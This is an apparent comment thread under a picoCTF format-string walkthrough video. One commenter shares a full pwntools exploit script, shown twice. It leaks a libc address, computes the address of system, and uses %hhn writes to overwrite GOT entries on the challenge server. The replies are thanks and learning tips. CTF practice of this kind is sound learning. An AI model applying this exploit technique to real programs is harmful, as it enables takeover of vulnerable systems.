Nice vid. The %03d padding for the payload was neat. Given that setvbuf and system are 0x2ac90 distant in the libc Ghidra listing, why not take that number from the given setvbuf address to get the system address? Don't think the printf buffer is character limited. Was nice to see the Makefile too at pwn. from pwn import * io = remote('rhea.picoctf.net', 54882) context.log_level = 'debug' print(io.recvuntil('in libc: ')) setvbuf_addr = io.recvuntil(' ', drop=True) print(setvbuf_addr) system_addr = hex(int(setvbuf_addr[2:],16)-0x2ac90)[2:] # first [2:] removes the '0x' by converting a bytes object to a string object for manipulation, nice! print(system_addr) byte3 = int(system_addr[6:8],16) # decimal values for %hhn character count byte2 = int(system_addr[8:10],16) byte1 = int(system_addr[10:12],16) # always 96 (0x60) so no calculation required filler1 = (byte2 - byte1)%256 - 4 # -4 accounts for ,ZZ, characters in payload filler2 = (byte3 - byte2)%256 - 4 payload = '' payload += '%92cZZZ,%44$hhn,' # 92 characters plus ZZZ, gives 96 payload += '%' + '%03d'%filler1 + 'cZZ,' + '%45$hhn,' payload += '%' + '%03d'%filler2 + 'cZZ,' + '%46$hhn,' payload += '\x18\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x1a\x40\x40\x00\x00\x00\x00\x00' print(payload) io.sendline(payload) io.interactive()
@@carlislemc The pico challenges have been interesting this year and your videos have been brilliant. The single byte %hhn approach is powerful, because even with a negative difference between bytes, the mod arithmetic takes care of it.
Any documents??
Which place do you learn , because i know lit bit of English 😢
Mostly by reading writeups at CTF time
next time please take it slowly step by step cause it's hard understanding you
Thanks for the feedback
thanks!
you're welcome! Glad you liked it.
Nice vid. The %03d padding for the payload was neat. Given that setvbuf and system are 0x2ac90 distant in the libc Ghidra listing, why not take that number from the given setvbuf address to get the system address? Don't think the printf buffer is character limited. Was nice to see the Makefile too at pwn.
from pwn import *
io = remote('rhea.picoctf.net', 54882)
context.log_level = 'debug'
print(io.recvuntil('in libc: '))
setvbuf_addr = io.recvuntil('
', drop=True)
print(setvbuf_addr)
system_addr = hex(int(setvbuf_addr[2:],16)-0x2ac90)[2:] # first [2:] removes the '0x' by converting a bytes object to a string object for manipulation, nice!
print(system_addr)
byte3 = int(system_addr[6:8],16) # decimal values for %hhn character count
byte2 = int(system_addr[8:10],16)
byte1 = int(system_addr[10:12],16) # always 96 (0x60) so no calculation required
filler1 = (byte2 - byte1)%256 - 4 # -4 accounts for ,ZZ, characters in payload
filler2 = (byte3 - byte2)%256 - 4
payload = ''
payload += '%92cZZZ,%44$hhn,' # 92 characters plus ZZZ, gives 96
payload += '%' + '%03d'%filler1 + 'cZZ,' + '%45$hhn,'
payload += '%' + '%03d'%filler2 + 'cZZ,' + '%46$hhn,'
payload += '\x18\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x1a\x40\x40\x00\x00\x00\x00\x00'
print(payload)
io.sendline(payload)
io.interactive()
Doing that subtraction is a better idea than what I did.
@@carlislemc The pico challenges have been interesting this year and your videos have been brilliant. The single byte %hhn approach is powerful, because even with a negative difference between bytes, the mod arithmetic takes care of it.
@@robertdreyfus5436thanks for the kind words
thanks for your script man, more easy to understand!